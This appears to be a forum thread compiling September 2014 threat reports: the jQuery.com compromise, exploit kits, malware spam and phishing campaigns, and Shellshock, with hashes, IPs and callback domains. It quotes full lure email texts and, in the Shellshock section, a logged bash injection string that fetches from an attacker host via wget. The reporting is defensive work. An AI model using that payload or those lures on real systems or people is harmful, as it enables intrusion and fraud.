23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromised happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.com/resources/blog/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-risk

>> https://blog.malwarebytes.org/?s=RIG+exploit+kit

- https://isc.sans.edu/diary.html?storyid=18699
2014-09-23

46.182.31.77: https://www.virustotal.com/en/ip-address/46.182.31.77/information/
___

Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmicro.com/trendlabs-security-intelligence/nuclear-exploit-kit-evolves-includes-silverlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit exploit kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/2-Nuclear-Exploit-Kit-Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/nuclearexploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074 - 9.3 (HIGH)

:mad: :fear::fear:

FYI...

Fake BankLine SPAM
- http://blog.dynamoo.com/2014/09/you-have-received-new-secure-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
From: Bankline [secure.message@ bankline .com]
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
First time users - will need to register after opening the attachment...

The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustotal.com/en-gb/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411546325/

** https://anubis.iseclab.org/?action=result&task_id=1d5af02378c37a5b47d2e9524c46863ef&format=html

- http://myonlinesecurity.co.uk/received-new-secure-message-bankline-fake-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustotal.com/en/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Voice mail SPAM
- http://myonlinesecurity.co.uk/inclarity-net-voice-message-attached-01636605058-name-unavailable-fake-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Time: Sep 23, 2014 10:50:00 AM
Click attachment to listen to Voice Message

24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/490f83b60921c80a4666ff9b546ce0a233199949d4a00a6035178fa685debbfb/analysis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'overdue invoice' SPAM – malware
- http://myonlinesecurity.co.uk/reminder-overdue-invoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
Reminder of overdue invoice: 708872110964932
Overdue Payment: 122274492356288
Due Date E-Mail Reminder: 417785972641224
Payment reminder: 461929101577209
Past Due Reminder Letter: 199488661953143
Bills Reminder: 325332051074690
Automatic reminder: 676901889653218
Late payment: 475999033756578
Reminder: 215728756825356
The email looks like:
Hello,
This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
Account ID: 5FCDMF9. This notice is a reminder your payment is due.
Regards,
Rex Gloeckler
Olympus Industrial...

24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/de2012097279e862bde5f4ffc8e649ede75400aa7c2afd6b343998c91657968f/analysis/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustotal.com/en/ip-address/157.56.96.53/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.97: https://www.virustotal.com/en/ip-address/95.101.0.97/information/
213.186.33.17: https://www.virustotal.com/en/ip-address/213.186.33.17/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
___

Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecurity.co.uk/american-express-security-concern-data-breach-home-depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...

Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/

- http://threattrack.tumblr.com/post/98321608223/american-express-home-depot-credentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/094c409ba72f53cb124310343c3a213b/tumblr_inline_ncf48aKPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___

Netcraft Sep 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/09/24/september-2014-web-server-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___

Viator(dot)com - Data Compromise ...
- https://blog.malwarebytes.org/online-security/2014/09/viator-com-data-compromise-are-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.com/about/media-center/press-releases/pr33251
Sep 19, 2014

... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___

Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

- http://arstechnica.com/security/2014/09/google-stops-malicious-advertising-campaign-that-could-have-reached-millions/
Sep 22 2014

:mad: :fear:

FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-rbs-bacs-transfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@ rbs .co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link ...

Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@ sage .com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...
Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIitE/VCPrdXzlOiI/AAAAAAAAFvA/YGCgcp8GX2s/s1600/sage2.png

Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below ...

NatWest Invoice: "Important - New account invoice
From: NatWest Invoice [invoice@ natwest .com]
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here ...

The links in the emails go to different download locations to make it harder to block... In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/file/1397ff56e47b642ff1f4eaaaedc3b84fc5cd7c619b25a894a57dabe62987d84c/analysis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
91.196.0.119

- http://threattrack.tumblr.com/post/98386009528/sage-software-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c600697c85ad23d80119101ea06360d0/tumblr_inline_ncglljx1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-banking-24-09-14-fake-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Accounts Dept
Halls Holdings Ltd
Tel: 01743 450700
Fax: 01743 443759 ...

25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cfd9d4f6fc16e6cf4f5960b5c1b3ad5724f86ec0eefd6e87ab154c4b1e156443/analysis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outlook-received-voice-mail-fake-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE7838396453.wav (26 KB)
Caller-Id: 7838396453
Message-Id: ID9CME
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c97b0291ac92a49293a1c8e5a9145241d2e09f9b53df8c13c70ca33701090773/analysis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustotal.com/en/ip-address/23.21.52.195/information/
95.100.255.137: https://www.virustotal.com/en/ip-address/95.100.255.137/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."

:fear::fear: :mad:

FYI...

Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

You have a new voice
From: Voice Mail [Voice.Mail@ victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@ rbs .co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...

... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___

Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
Payment Details [Incident: 711935-599632]
Typical e-mail details:
We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
Regards,
Bill.com Payment Operations

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png

Malicious File Name and MD5:
bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)

Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@ bt .com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

RBS Bankline: Outstanding invoice
From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
To: <REDACTED>
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here ...

In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction. Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt ...

26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/

:mad: :fear::fear:

FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/

83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___

Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."

:fear::fear: :mad:

FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-uk-remittance-advice-fake-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in the statement.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...

Update: a slightly revised email coming out now but still the -same- malware attachment
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in statement.
Any queries please contact us on 01934-524004.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...

29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d8a6c8626cab8f4588254ce0d48460e9968ede774cc7c5b2b756ce4055e39d1d/analysis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-complete-office-solutions-fake-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a7ad4bf44b21ca85233b2eb8f708b196df4226db37406e74b6e791f6f05c75ea/analysis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-address/82.165.38.206/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malware-spam-lloyds-commercial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...

The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/file/75da79cb6c1911e83500f603d3432a942ee200a17b97f10a9160142b2261e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
